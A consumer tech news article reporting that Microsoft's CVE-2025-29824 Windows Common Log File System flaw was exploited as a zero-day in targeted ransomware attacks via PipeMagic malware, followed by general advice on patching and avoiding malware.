Of the 134 Windows security flaws fixed by Microsoft in yesterday’s Patch Tuesday updates, only one was a zero-day flaw that could be potentially exploited by hackers in order to gain system privileges.
Today though, Microsoft has said that flaw (tracked as CVE-2025-29824) has indeed been used as a zero-day exploit in targeted ransomware attacks.
Since it has now been patched, it is of critical importance that Windows users download and install this update immediately to protect their systems. Though the attacks were aimed at a small number of international targets including IT and real estate sectors in the United States, financial institutions in Venezuela, a software company in Spain and a retail sector in Saudi Arabia, any unpatched system is vulnerable.
This zero-day flaw is a privilege escalation bug in the Windows Common Log File System that can be exploited in order to achieve SYSTEM privileges. The Hacker News explains that hackers value these types of exploits specifically because they can enable privileged access for widespread deployment and be used to infect vulnerable PCs with ransomware.
The threat actors have leveraged a malware named PipeMagic in order to deliver both the exploits as well as ransomware payloads; this is the second Window’s zero-day flaw to be delivered via this malware. The first one( tracked as CVE-2025-24983) was also a privilege escalation bug, but for the Win32 Kernel Subsystem. That vulnerability was flagged by ESET and patched by Microsoft last month.
While it is currently unknown how the attacks are gaining initial access, it does seem as though the threat actors behind them have been using the certutil utility to download the malware from a compromised third-party site that is being used to stage payloads. Microsoft is tracking the activity and post compromise exploitation of this zero-day under the name Storm-2460.
How to stay safe from malware and ransomware
Patch Tuesday falls on the second Tuesday of every month, so set a calendar reminder so that you can remember to update your PC around that time. Outdated software is a great access point for hackers and threat actors, so don't leave yourself open to attacks by neglecting to install serious updates. Likewise, you can also remind yourself to set up automated updates and scans for your security software, since you should of course have one of the best antivirus programs installed on your PC too.
Since Windows Defender is built-in to Windows, you can use it to periodically scan your system for malware or viruses too. And obviously, you want to practice safe browsing habits online. You can see if your antivirus security suite comes with a hardened browser or VPN feature for an added layer of security but whatever you do, never click on links, attachments or downloads from unexpected senders or unknown sources. Only download apps and software from trusted app stores and developers, and know how to recognize common phishing techniques.
Zero-day flaws provide an easy way for hackers and other cybercriminals to gain a foothold for their attacks and this is why knowledge of them sells for such a high price. Unfortunately though, the only thing you can do to stay safe from attacks exploiting them is to install security updates as soon as they become available and to practice good cyber hygiene online.
More from Tom's Guide
- Scammers are impersonating QuickBooks in last-minute tax phishing scam — and it's stealing financial data
- Google just patched two critical Android zero-days exploited by hackers — update your phone right now
- T-Mobile is starting to send out data breach settlement payments for up to $25K — see if you qualify
You must confirm your public display name before commenting
Please logout and then login again, you will then be prompted to enter your display name.
